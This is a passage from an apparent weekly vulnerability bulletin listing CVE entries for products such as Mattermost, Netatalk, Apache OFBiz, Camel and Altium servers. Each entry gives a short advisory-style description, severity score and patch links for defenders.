| ZTE–MU5250 | There is an an information disclosure vulnerability in ZTE MU5250. Due to improper configuration of the access control mechanism, attackers can obtain information without authorization, causing the risk of information disclosure. | 2026-05-22 | 5.7 | CVE-2026-44409 | https://support.zte.com.cn/zte-iccp-isupport-webui/bulletin/detail/3711746568357343342 |
Low Vulnerabilities
| Primary Vendor — Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| baptisteArno–typebot.io | TypeBot is a chatbot builder tool. In versions 3.15.2 and prior, the bot engine’s the findResult query does not filter results by typebotId, allowing an authenticated user to load result data (user answers, variable values) from a different typebot by supplying a foreign resultId to the startChat endpoint. Exploitation is constrained by CUID2’s cryptographically random 24-character IDs (making brute-force infeasible), the requirement that rememberUser be enabled, and the need for matching variable names in the current typebot. If successfully exploited, an attacker can access the original user’s previous answers, session variable values, and hasStarted flag, potentially exposing PII like names, emails, and phone numbers. This issue has been fixed in version 3.16.0. | 2026-05-22 | 3.1 | CVE-2026-39967 | https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-f475-7m4x-m6mx https://github.com/baptisteArno/typebot.io/commit/73162634e6bdebd37a1a571db4062d30854e0400 https://github.com/baptisteArno/typebot.io/releases/tag/v3.16.0 |
| Besen–BS20 EV Charging Station | A vulnerability was determined in Besen BS20 EV Charging Station up to 20260426. This impacts an unknown function of the component Bluetooth Low Energy Handler. Executing a manipulation can lead to weak password requirements. The attack needs to be done within the local network. This attack is characterized by high complexity. The exploitability is said to be difficult. The original disclosure mentions, that “[t]hese vulnerabilities have been reported to Besen and we have received their acknowlegement that they are reviewing this as of April 2026.” | 2026-05-24 | 3.1 | CVE-2026-9394 | VDB-365375 | Besen BS20 EV Charging Station Bluetooth Low Energy weak password VDB-365375 | CTI Indicators (IOB, IOC, TTP) Submit #813569 | Besen EV Charging Station BS20 EV Charger Weak Authentication https://github.com/carfeii/besen#finding-1-weak-authentication-mechanism-in-besen-home-ev-charging-station-via-ble |
| Besen–BS20 EV Charging Station | A vulnerability was identified in Besen BS20 EV Charging Station up to 20260426. Affected is an unknown function of the component BLE/UDP. The manipulation leads to insufficiently protected credentials. The attack needs to be initiated within the local network. The original disclosure mentions, that “[t]hese vulnerabilities have been reported to Besen and we have received their acknowlegement that they are reviewing this as of April 2026.” | 2026-05-24 | 3.5 | CVE-2026-9395 | VDB-365376 | Besen BS20 EV Charging Station BLE/UDP insufficiently protected credentials VDB-365376 | CTI Indicators (IOB, IOC, TTP) Submit #813572 | Besen EV Charging Station BS20 EV Charger Insufficiently Protected Credentials https://github.com/carfeii/besen#finding-2-cleartext-credential-exposure-via-ble-and-udp-in-besen-home-ev-charging-station |
| Besen–BS20 EV Charging Station | A security flaw has been discovered in Besen BS20 EV Charging Station up to 20260426. Affected by this vulnerability is an unknown functionality of the component Firmware Version Check. The manipulation results in improper restriction of rendered ui layers. The attack can be executed remotely. A high complexity level is associated with this attack. The exploitation appears to be difficult. The original disclosure mentions, that “[t]hese vulnerabilities have been reported to Besen and we have received their acknowlegement that they are reviewing this as of April 2026.” | 2026-05-24 | 3.7 | CVE-2026-9396 | VDB-365377 | Besen BS20 EV Charging Station Firmware Version Check ui layer VDB-365377 | CTI Indicators (IOB, IOC) Submit #813575 | Besen EV Charging Station BS20 EV Charger Improper Verification of Cryptographic Signature https://github.com/carfeii/besen#finding-3-firmware-version-check-manipulation-and-ui-spoofing |
| Besen–BS20 EV Charging Station | A security vulnerability has been detected in Besen BS20 EV Charging Station up to 20260426. This affects an unknown part of the component BLE/WiFi. Such manipulation leads to authentication bypass by capture-replay. The attack must be carried out from within the local network. Attacks of this nature are highly complex. It is indicated that the exploitability is difficult. The original disclosure mentions, that “[t]hese vulnerabilities have been reported to Besen and we have received their acknowlegement that they are reviewing this as of April 2026.” | 2026-05-24 | 3.1 | CVE-2026-9398 | VDB-365379 | Besen BS20 EV Charging Station BLE/WiFi authentication replay VDB-365379 | CTI Indicators (IOB, IOC, TTP) Submit #813577 | Besen EV Charging Station BS20 EV Charger Improper Authorization https://github.com/carfeii/besen#finding-5-unauthorized-tampering-of-charger-commands |
| Dell–PowerFlex Manager (Appliance) | Dell PowerFlex Manager, version(s) <=4.6.2, contain(s) a Use of a Broken or Risky Cryptographic Algorithm vulnerability in the ssh. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Protection mechanism bypass. | 2026-05-22 | 3.6 | CVE-2025-46371 | https://www.dell.com/support/kbdoc/en-us/000391568/dsa-2025-435-security-update-for-dell-powerflex-rack-multiple-third-party-component-vulnerabilities https://www.dell.com/support/kbdoc/en-us/000391392/dsa-2025-434-security-update-for-dell-powerflex-appliance-multiple-third-party-component-vulnerabilities |
| HCL–BigFix Service Management (SM) | HCL BigFix Service Management (SM) is affected by a security misconfiguration due to a missing or insecure “X-Content-Type-Options” header. This could allow browsers to perform MIME-type sniffing, potentially causing malicious content to be interpreted and executed incorrectly. | 2026-05-20 | 3.7 | CVE-2025-31985 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128144 |
| jarrodwatts–claude-hud | Claude HUD through 0.0.12, patched in commit 234d9aa, contains a path traversal vulnerability that allows attackers to read arbitrary files by supplying an unvalidated transcript_path value via stdin JSON. Attackers can access any file readable by the process and the file metadata is written to a persistent cache file with insufficient permissions, creating a forensic record of accessed paths that survives process exit. | 2026-05-18 | 3.3 | CVE-2026-47091 | https://github.com/jarrodwatts/claude-hud/issues/485 https://github.com/jarrodwatts/claude-hud/pull/487 https://github.com/jarrodwatts/claude-hud/commit/234d9aad919b51326a43bcf90b45ae35c23afc30 https://www.vulncheck.com/advisories/claude-hud-path-traversal-via-transcript-path |
| Mattermost–Mattermost | Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13 fail to escape some variables that could contain malicious content during error page composition which allows an attacker with access to edit some site configuration to execute some malicious code via injecting some JS as part of those values.. Mattermost Advisory ID: MMSA-2026-00622 | 2026-05-18 | 3.8 | CVE-2026-3495 | MMSA-2026-00622 |
| Mattermost–Mattermost | Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13 fail to validate that the RefreshedToken differs from the original invite token during remote cluster invite confirmation which allows an authenticated attacker to bypass token rotation and reuse the original invite token via sending a crafted invite confirmation with a RefreshedToken matching the original token. Mattermost Advisory ID: MMSA-2026-00575 | 2026-05-18 | 3.7 | CVE-2026-4273 | MMSA-2026-00575 |
| Mattermost–Mattermost | Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13 fail to check if {{team_id}} was being changed when updating playbooks, allowing users with only {{Manage Playbook Configurations}} permission to change a playbook’s team, bypassing manage members restriction via PUT api. Mattermost Advisory ID: MMSA-2025-00552 | 2026-05-18 | 3.1 | CVE-2026-4286 | MMSA-2025-00552 |
| Mattermost–Mattermost | Mattermost Desktop App versions <=6.1 6.0.1 5.4.13.0 fail to prevent server-rendered content from closing an underlying application view in the Mattermost Desktop App which allows a malicious server or plugin to crash the desktop client via invoking {{window.close()}} in the renderer context, leading to a denial of service condition at the client level. Mattermost Advisory ID: MMSA-2026-00633 | 2026-05-18 | 3.5 | CVE-2026-4643 | MMSA-2026-00633 |
| Mattermost–Mattermost | Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13 fail to validate the Host header when constructing response URLs for custom slash commands which allows an authenticated attacker to redirect slash command responses to an attacker-controlled server via a spoofed Host header.. Mattermost Advisory ID: MMSA-2026-00582 | 2026-05-18 | 3.5 | CVE-2026-6333 | MMSA-2026-00582 |
| Mattermost–Mattermost | Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13 fail to enforce client identity binding during the OAuth authorization code redemption flow which allows an authenticated OAuth client to redeem authorization codes issued to a different client via a crafted token exchange request.. Mattermost Advisory ID: MMSA-2026-00570 | 2026-05-18 | 3.1 | CVE-2026-6334 | MMSA-2026-00570 |
| n/a–JeecgBoot | A vulnerability has been found in JeecgBoot 3.9.1. This issue affects some unknown processing of the file /openapi/call/ of the component OpenAPI Endpoint. Such manipulation leads to improper authentication. The attack can be executed remotely. A high complexity level is associated with this attack. The exploitability is assessed as difficult. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 3.7 | CVE-2026-9373 | VDB-365337 | JeecgBoot OpenAPI Endpoint call improper authentication VDB-365337 | CTI Indicators (IOB, IOC, IOA) Submit #813251 | jeecgboot JeecgBoot 3.9.1 Improper Authentication |
| n/a–vBulletin | A vulnerability was found in vBulletin 6.x. This impacts an unknown function of the component Login. Performing a manipulation results in cross site scripting. It is possible to initiate the attack remotely. The exploit has been made public and could be used. VulDB is withholding an extended redistribution of exploit details to prevent simplified exploitation. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 3.5 | CVE-2026-9357 | VDB-365320 | vBulletin Login cross site scripting VDB-365320 | CTI Indicators (IOB, IOC, TTP) Submit #813052 | Cross Site Scripting no fórum vBulletin 6.xx Vbulletin 6.x.x Cross Site Scripting |
| NeoRazorX–facturascripts | FacturaScripts is an open source accounting and invoicing software. Versions 2025.7 and prior contain a Reflected Cross-Site Scripting (XSS) vulnerability through the fsNick cookie parameter. The application reflects the cookie’s value directly into the HTML without sanitization. The fsNick cookie is rendered into the DOM without encoding. While the server does reject the modified session and forces a logout, the HTML containing the payload reaches the browser first. This lets the script execute immediately upon load, effectively beating the redirect. This issue has been fixed in version 2025.8. | 2026-05-18 | 3.9 | CVE-2026-27964 | https://github.com/NeoRazorX/facturascripts/security/advisories/GHSA-gq5c-rw37-g46c https://github.com/NeoRazorX/facturascripts/commit/9066e10326029adf012114e27eb5f3f33f78ecfd |
| Netatalk–Netatalk | A dead bounds check in the Spotlight RPC unmarshaller in Netatalk 3.0.0 through 4.4.2 results in an unreachable code path that provides no effective bounds protection, which may allow a remote authenticated attacker to obtain limited information via crafted Spotlight RPC requests. | 2026-05-21 | 3.1 | CVE-2026-44057 | Netatalk Security Advisory CVE-2026-44057 |
| Netatalk–Netatalk | A race condition in the privilege toggle mechanism in Netatalk 2.2.5 through 4.4.2 allows a local attacker to obtain limited information, modify limited data, or cause a minor service disruption. | 2026-05-21 | 3.9 | CVE-2026-44059 | Netatalk Security Advisory CVE-2026-44059 |
| Netatalk–Netatalk | An off-by-two error in lp_write() in papd in Netatalk 2.0.0 through 4.4.2 allows an adjacent network attacker to modify limited data or cause a minor service disruption via crafted print data. | 2026-05-21 | 3.7 | CVE-2026-44065 | Netatalk Security Advisory CVE-2026-44065 |
| Netatalk–Netatalk | A heap over-read in extended attribute (EA) header parsing in Netatalk 2.1.0 through 4.4.2 allows a remote authenticated attacker to obtain limited information or cause a minor service disruption via crafted EA data. | 2026-05-21 | 3.7 | CVE-2026-44067 | Netatalk Security Advisory CVE-2026-44067 |
| Netatalk–Netatalk | An integer underflow in the volxlate function in Netatalk 3.0.0 through 4.4.2 allows a local privileged user to obtain limited information, modify limited data, or cause a minor service disruption via crafted volume translation input. | 2026-05-21 | 3.4 | CVE-2026-44069 | Netatalk Security Advisory CVE-2026-44069 |
| Netatalk–Netatalk | An unbounded memory reallocation in the charset conversion code in Netatalk 2.0.0 through 4.4.2 allows a remote authenticated attacker to cause a minor denial of service via crafted character conversion requests. | 2026-05-21 | 3.1 | CVE-2026-44070 | Netatalk Security Advisory CVE-2026-44070 |
| Netatalk–Netatalk | Netatalk 3.1.2 through 4.4.2 is compiled without FORTIFY_SOURCE, which disables built-in buffer overflow detection at runtime, potentially allowing a remote attacker to cause a minor denial of service via memory errors that would otherwise be caught and safely terminated by runtime protection. | 2026-05-21 | 3.7 | CVE-2026-44071 | Netatalk Security Advisory CVE-2026-44071 |
| Netatalk–Netatalk | Netatalk 2.1.0 through 4.4.2 combines multiple errno values using bitwise OR, resulting in incorrect error codes when multiple error conditions occur simultaneously, which may allow a remote attacker to cause a minor service disruption via conditions that trigger incorrect error-handling paths. | 2026-05-21 | 3.7 | CVE-2026-44074 | Netatalk Security Advisory CVE-2026-44074 |
| Netatalk–Netatalk | A missing break statement in DSI OpenSession processing in Netatalk 1.5.0 through 4.4.2 causes a DSIOPT_ATTNQUANT switch case to fall through into DSIOPT_SERVQUANT, resulting in unintended session option handling that may allow a remote attacker to cause a minor service disruption via crafted DSI session options. | 2026-05-21 | 3.7 | CVE-2026-44075 | Netatalk Security Advisory CVE-2026-44075 |
| Netatalk–Netatalk | A format string argument mismatch in Netatalk 3.0.3 through 4.4.2 allows a remote authenticated attacker to cause a minor denial of service via crafted input that triggers incorrect format string processing. | 2026-05-21 | 3.1 | CVE-2026-7835 | Netatalk Security Advisory CVE-2026-7835 |
| Netatalk–Netatalk | An incorrect calculation in the hextoint macro in Netatalk 2.0.0 through 4.4.2 due to improper uppercase character handling allows a remote authenticated attacker to cause limited data modification via crafted hexadecimal input. | 2026-05-21 | 3.1 | CVE-2026-7836 | Netatalk Security Advisory CVE-2026-7836 |
| Netatalk–Netatalk | A time-of-check time-of-use (TOCTOU) condition in the ad_flush function in Netatalk 3.0.0 through 4.4.2 involves root-privileged file operations, which may allow a remote attacker to cause limited data modification under specific race conditions. | 2026-05-21 | 3.7 | CVE-2026-7837 | Netatalk Security Advisory CVE-2026-7837 |
| Netatalk–Netatalk | Netatalk 2.2.1 through 4.4.2 calls system() after a failed chdir() without properly handling the error condition, which allows a local privileged user to execute unintended commands or cause a minor service disruption under specific conditions. | 2026-05-21 | 2.5 | CVE-2026-44072 | Netatalk Security Advisory CVE-2026-44072 |
| OpenHarmony–OpenHarmony | in OpenHarmony v6.0 and prior versions allow a local attacker cause DOS. | 2026-05-19 | 3.3 | CVE-2026-25110 | https://gitcode.com/openharmony/security/tree/master/zh/security-disclosure/2026/2026-04.md |
| OpenHarmony–OpenHarmony | in OpenHarmony v6.0 and prior versions allow a local attacker cause DOS. | 2026-05-19 | 3.3 | CVE-2026-27781 | https://gitcode.com/openharmony/security/tree/master/zh/security-disclosure/2026/2026-04.md |
| OpenHarmony–OpenHarmony | in OpenHarmony v6.0 and prior versions allow a local attacker cause DOS. | 2026-05-19 | 3.3 | CVE-2026-28751 | https://gitcode.com/openharmony/security/tree/master/zh/security-disclosure/2026/2026-04.md |
| OpenHarmony–OpenHarmony | in OpenHarmony v6.0 and prior versions allow a local attacker cause DOS. | 2026-05-19 | 3.3 | CVE-2026-33565 | https://gitcode.com/openharmony/security/tree/master/zh/security-disclosure/2026/2026-05.md |
| opensourcepos–Open Source Point of Sale | A flaw has been found in opensourcepos Open Source Point of Sale up to 3.4.2. Impacted is the function Login of the file app/Models/Employee.php of the component Employee Login. This manipulation causes use of weak hash. Remote exploitation of the attack is possible. The attack is considered to have high complexity. The exploitability is considered difficult. The actual existence of this vulnerability is currently in question. The vendor explains: “[T]he code is still there to allow the upgrade path to work. The default password is initially seeded with the old hash function, but then migrated to a newer one after login. [T]he hash version check might be cleaned up in the future. Currently it’s not actively in use as any password change will use a newer hash function.” | 2026-05-18 | 3.7 | CVE-2026-8803 | VDB-364436 | opensourcepos Open Source Point of Sale Employee Login Employee.php login weak hash VDB-364436 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #802561 | opensourcepos Open Source Point of Sale 3.4.1 Weak Encoding for Password |
| QuantumNous–new-api | A security vulnerability has been detected in QuantumNous new-api up to 0.12.1. This affects the function RelayMidjourneyImage/GetByOnlyMJId of the file router/relay-router.go of the component Midjourney Image Relay Endpoint. Such manipulation leads to authorization bypass. The attack can be launched remotely. The attack requires a high level of complexity. The exploitability is reported as difficult. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-23 | 3.7 | CVE-2026-9306 | VDB-365253 | QuantumNous new-api Midjourney Image Relay Endpoint relay-router.go GetByOnlyMJId authorization VDB-365253 | CTI Indicators (IOB, IOC, IOA) Submit #812196 | QuantumNous new-api 0.12.1 Authorization Bypass Through User-Controlled Key (CWE-639) https://gist.github.com/YLChen-007/13974ead25fc6dac42fd7bac62fbb2df |
| RsyncProject–rsync | Rsync versions before 3.4.3 contain an off-by-one out-of-bounds stack write vulnerability in the establish_proxy_connection() function in socket.c that allows network attackers to corrupt stack memory by sending a malformed HTTP proxy response. Attackers can exploit this by positioning themselves between the client and proxy or controlling the proxy server to send a response line of 1023 or more bytes without a newline terminator, causing a null byte to be written to an out-of-bounds stack address when the RSYNC_PROXY environment variable is set. | 2026-05-20 | 3.1 | CVE-2026-45232 | https://github.com/RsyncProject/rsync/security/advisories/GHSA-8f85-j2cv-59m8 https://github.com/RsyncProject/rsync/releases/tag/v3.4.3 https://www.vulncheck.com/advisories/rsync-off-by-one-stack-write-via-http-proxy |
| SourceCodester–SUP Online Shopping | A vulnerability was identified in SourceCodester SUP Online Shopping 1.0. The impacted element is an unknown function of the file /admin/productedit.php. The manipulation of the argument productName leads to cross site scripting. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. | 2026-05-24 | 2.4 | CVE-2026-9377 | VDB-365340 | SourceCodester SUP Online Shopping productedit.php cross site scripting VDB-365340 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #813270 | sourcecodester SUP Online Shopping Project V1.0 Cross Site Scripting https://github.com/redshadowword-cell/CVE/issues/13 https://www.sourcecodester.com/ |
| SPIP–SPIP | action/cookie.php in ecrire in SPIP before 4.4.15 is prone to an open redirect vulnerability. | 2026-05-24 | 3.5 | CVE-2026-48832 | https://blog.spip.net/Mise-a-jour-de-securite-sortie-de-SPIP-4-4-15.html?lang=fr https://git.spip.net/spip/spip/-/commit/75629034697ab52a963a340afd10930407e1cd55 https://git.spip.net/spip/ecrire/-/commit/a22cb8a56f1e37ff3854b73ff3f66aa3df47070a |
| ulisesbocchio–jasypt-spring-boot | A weakness has been identified in ulisesbocchio jasypt-spring-boot up to 3.0.5/4.0.4. Affected by this vulnerability is the function getSecretKeySaltGenerator of the file jasypt-spring-boot/src/main/java/com/ulisesbocchio/jasyptspringboot/encryptor/SimpleGCMConfig.java of the component Password Hash Handler. Executing a manipulation can lead to use of a one-way hash with a predictable salt. The attack can be launched remotely. The attack requires a high level of complexity. The exploitation appears to be difficult. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-24 | 3.7 | CVE-2026-9370 | VDB-365333 | ulisesbocchio jasypt-spring-boot Password Hash SimpleGCMConfig.java getSecretKeySaltGenerator hash predictable salt VDB-365333 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #813198 | Ulises Bocchio jasypt-spring-boot 3.0.0 to 4.0.4 Cryptographic Issues https://github.com/ulisesbocchio/jasypt-spring-boot/issues/431 https://github.com/dntyfate/cve/issues/3 https://github.com/ulisesbocchio/jasypt-spring-boot/ |
Severity Not Yet Assigned
| Primary Vendor — Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| 9front–9front | Mothra would respect a default value given by a website for HTML file upload forms. An attacker could craft a website with a malicious default file path, and then conceal this form element. | 2026-05-22 | not yet calculated | CVE-2026-9053 | https://git.9front.org/plan9front/9front/d145acc9ef0da47131af6ad94e87264e04870d47/commit.html |
| 9front–9front | An attacker sending tcp, il, rudp, rudp, or gre packets with a length less than the header size would trigger a kernel panic. | 2026-05-22 | not yet calculated | CVE-2026-9054 | https://git.9front.org/plan9front/9front/7838d68969549f938cc8e80c0c2b4218cb12805c/commit.html https://git.9front.org/plan9front/9front/f86917b75e9562f90545b7e484dbdcd748236952/commit.html https://git.9front.org/plan9front/9front/70c97c334171c715df82774d1a47638abaca2db4/commit.html |
| Advantech–WebAccess/SCADA 8.0-2015.08.16 | Cross Site Scripting vulnerability in Advantech WebAccess/SCADA 8.0-2015.08.16 allows a remote attacker to obtain sensitive information via the decryption field in the Create New Project User component | 2026-05-22 | not yet calculated | CVE-2026-36226 | https://github.com/NullByte8080/CVE-2026-36226 |
| Altium–Altium 365 | A missing authentication vulnerability exists in the Altium 365 SearchService. A legacy SOAP endpoint exposes search index operations without requiring authentication, session tokens, or any form of identity verification. An unauthenticated network attacker who can reference a target workspace’s identifier can interact with that workspace’s search index, crossing tenant boundaries. Successful exploitation allows reading a workspace’s indexed contents (such as component data, project and folder names, and user metadata) and injecting, modifying, or deleting search index entries. These operations affect the search index only, not the underlying vault data, but they can disclose sensitive workspace information and compromise the integrity and availability of search results. Altium 365 cloud deployments are affected; on-premise Altium Enterprise Server is not affected. | 2026-05-21 | not yet calculated | CVE-2026-9152 | https://www.altium.com/platform/security-compliance/security-advisories |
| Altium–Altium Enterprise Server | A path traversal vulnerability exists in the Altium Enterprise Server ComparisonService due to missing filename sanitization in the Gerber file upload APIs. A regular authenticated workspace user can supply a crafted filename in the multipart Content-Disposition header to escape the intended temporary upload directory and write arbitrary files to any location on the server filesystem. Because content-controlled files can be written to web-accessible directories, this can be escalated to remote code execution in the context of the service account. It can also be used to overwrite application binaries or configuration files, leading to service takeover or denial of service. | 2026-05-20 | not yet calculated | CVE-2026-9102 | https://www.altium.com/platform/security-compliance/security-advisories |
| Altium–Altium Enterprise Server | A path traversal vulnerability exists in the Altium Enterprise Server Viewer StorageController due to improper handling of file path route parameters. On on-premise deployments that use local filesystem storage, a regular authenticated user can supply a URL-encoded absolute path (such as an encoded drive letter) in a Viewer storage API request, causing the configured storage root to be discarded and allowing arbitrary files to be read from the server filesystem. Because the readable files include the server’s master configuration, which stores database credentials, signing key locations, certificate passwords, and OAuth secrets, exploitation can lead to disclosure of all server secrets and full compromise of the server and its data. Cloud deployments are not affected, as they use object storage and do not enable this component. | 2026-05-20 | not yet calculated | CVE-2026-9129 | https://www.altium.com/platform/security-compliance/security-advisories |
| AMD[.]com–AMD EPYC 4004 | Improper input validation in the System Management Mode (SMM) communications buffer could allow a privileged attacker to perform an out of bounds read or write to a limited section of the Top of Memory Segment (TSEG) memory region, potentially resulting in loss of confidentiality or integrity. | 2026-05-19 | not yet calculated | CVE-2024-36343 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-3030.html https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-4017.html |
| Apache Software Foundation–Apache Airflow Amazon provider | In the AWS Secrets Manager and SSM Parameter Store secrets backends of `apache-airflow-providers-amazon` prior to 9.28.0, the team-scoping logic could resolve a `conn_id` containing a `/` (e.g. `”my_team/conn”`) to the same path as another team’s team-scoped secret when the caller had no team context. A privileged caller without team context could therefore retrieve another team’s secret by crafting a colliding `conn_id`. Fixed in 9.28.0 by switching the team-scope separator to `–` and rejecting team-shaped `conn_id`s when team context is absent. Affects the experimental multi-tenant teams feature only. Users are recommended to upgrade to `apache-airflow-providers-amazon` 9.28.0, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-42526 | https://github.com/apache/airflow/pull/65703 https://lists.apache.org/thread/0092sz5g520d3qqjb01wd61myqlgjtyn |
| Apache Software Foundation–Apache Airflow CNCF Kubernetes provider | JWT tokens that were used by workers in Kubernetes Executors have been exposed to users who had read only access to Kuberentes Pods. This could allow users with just read-only access to perform actions that were only available to running tasks via Task SDK and potentially allow to modify state of Airflow Database for tasks. | 2026-05-19 | not yet calculated | CVE-2026-27173 | https://github.com/apache/airflow/pull/60108 https://lists.apache.org/thread/pk3m2z4s2rkmc0v6gh9hnch9spc6stqw |
| Apache Software Foundation–Apache Camel | Camel-CXF and Camel-Knative Message Header Injection via Missing Inbound Filtering The CXF and Knative HeaderFilterStrategy implementations (CxfRsHeaderFilterStrategy in camel-cxf-rest, CxfHeaderFilterStrategy in camel-cxf-transport, and KnativeHttpHeaderFilterStrategy in camel-knative-http) only filter outbound Camel-internal headers via setOutFilterStartsWith, while not configuring inbound filtering via setInFilterStartsWith. As a result, an unauthenticated attacker can inject Camel-internal headers (e.g. CamelExecCommandExecutable, CamelFileName) via HTTP requests to CXF-RS or CXF-SOAP endpoints. When a route forwards messages from these endpoints to header-driven components such as camel-exec or camel-file, the injected headers override configured values, enabling remote code execution or arbitrary file writes. This is the same pattern that was previously addressed in camel-undertow (CVE-2025-30177), the broader incoming-header filter (CVE-2025-27636 and CVE-2025-29891), and non-HTTP strategies (CVE-2026-40453). This issue affects Apache Camel: from 3.18.0 before 4.14.6, from 4.15.0 before 4.18.2. Users are recommended to upgrade to version 4.19.0, which fixes the issue. If users are on the 4.18.x LTS releases stream, then they are suggested to upgrade to 4.18.2. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.6. | 2026-05-19 | not yet calculated | CVE-2026-47323 | https://camel.apache.org/security/CVE-2026-47323.html |
| Apache Software Foundation–Apache Camel K | (Externally Controlled Reference to a Resource in Another Sphere), (Authorization Bypass Through User-Controlled Key) vulnerability in Apache Camel K. Authorized users in a Kubernetes namespace can create a Build resource, controlling the Pod generation in a namespace of their choice, including the operator namespace. This issue affects Apache Camel K: from 2.0.0 before 2.8.1, from 2.9.0 before 2.9.2, from 2.10.0 before 2.10.1. Users are recommended to upgrade to version 2.10.1 (or 2.8.1 or 2.9.2), which fixes the issue. | 2026-05-21 | not yet calculated | CVE-2026-45760 | https://camel.apache.org/security/CVE-2026-45760.html |
| Apache Software Foundation–Apache CXF | The fix for CVE-2025-48913: Apache CXF: Untrusted JMS configuration can lead to RCE was not complete, meaning that another path in the code might lead to code execution capabilities, if untrusted users are allowed to configure JMS for Apache CXF. Users are recommended to upgrade to versions 4.2.1, 4.1.6 or 3.6.11, which fix this issue. | 2026-05-22 | not yet calculated | CVE-2026-44417 | https://lists.apache.org/thread/bqg6gjy2cx7rfyqjxcpv3jwjvmclvz4o |
| Apache Software Foundation–Apache CXF | Insecure XML parser configuration in Apache CXF’s WS-Transfer module may allow attackers to perform XXE attacks. Users are recommended to upgrade to versions 4.2.1, 4.1.6 or 3.6.11, which fix this issue. | 2026-05-22 | not yet calculated | CVE-2026-44618 | https://lists.apache.org/thread/c7vb015f8ljmjl44030mn0yfq71f7sd7 |
| Apache Software Foundation–Apache CXF | An LDAP injection vulnerability in the LDAP Certificate repository of the XKMS server in Apache CXF may allow an attacker to retrieve arbitrary certificates from the repository. Users are recommended to upgrade to versions 4.2.1, 4.1.6 or 3.6.11, which fix this issue. | 2026-05-22 | not yet calculated | CVE-2026-44930 | https://lists.apache.org/thread/c1zqxppo1m5z3kbdhjn5p991zk09ynkh |
| Apache Software Foundation–Apache Fory | Deserialization of untrusted data in Apache Fory PyFory. PyFory’s ReduceSerializer could bypass documented DeserializationPolicy validation hooks during reduce-state restoration and global-name resolution. An application is vulnerable if it deserializes attacker-controlled data using PyFory Python-native mode with strict mode disabled and relies on DeserializationPolicy to restrict unsafe classes, functions, or module attributes. This issue affects Apache Fory: from before 1.0.0. Mitigation: Users of Apache Fory are recommended to upgrade to version 1.0.0 or later, which enforces DeserializationPolicy validation for the affected ReduceSerializer paths and thus fixes this issue. | 2026-05-21 | not yet calculated | CVE-2026-48207 | https://fory.apache.org/security/#cve-2026-48207-pyfory-reduceserializer-deserializationpolicy-bypass |
| Apache Software Foundation–Apache OFBiz | Improper Neutralization of Special Elements Used in a Template Engine vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. Please note that in the updated version, “Data Resource” records with dataTemplateTypeId = “FTL” are no longer supported. Additionally, in the updated version, the “Ecommerce Customer” security group no longer includes content management grants. Users are advised to remove these permissions from any production site as well. | 2026-05-19 | not yet calculated | CVE-2026-29207 | https://lists.apache.org/thread/3rcrp8bh3x6ovrj5xnc0fm1f0nrn52r0 |
| Apache Software Foundation–Apache OFBiz | Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-29220 | https://lists.apache.org/thread/5hjnmt9no6mmtg8sxq3mhonzff1vkd5m |
| Apache Software Foundation–Apache OFBiz | Server-Side Request Forgery (SSRF) vulnerability in Apache OFBiz via Content component operations. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-29226 | https://lists.apache.org/thread/6707wys8jxzmowxggn4cmtwwk9ygl2tr |
| Apache Software Foundation–Apache OFBiz | Improper Input Validation vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-31378 | https://lists.apache.org/thread/cbl8qkqtxv90m6ssfwd58bnoh933v38t |
| Apache Software Foundation–Apache OFBiz | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’), Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’), Improper Control of Generation of Code (‘Code Injection’) vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-31379 | https://lists.apache.org/thread/1tcnkxjm0s6n1ohfb21brl25dt0hv9by |
| Apache Software Foundation–Apache OFBiz | Improper Neutralization of Special Elements used in an Expression Language Statement (‘Expression Language Injection’) vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-31380 | https://lists.apache.org/thread/v2brvq1tf4q491obkxv8p7fc5qfshc08 |
| Apache Software Foundation–Apache OFBiz | Improper Authentication vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-31387 | https://lists.apache.org/thread/3wgybgdvmbfvly24zm4sb4y53fc1pqcf |
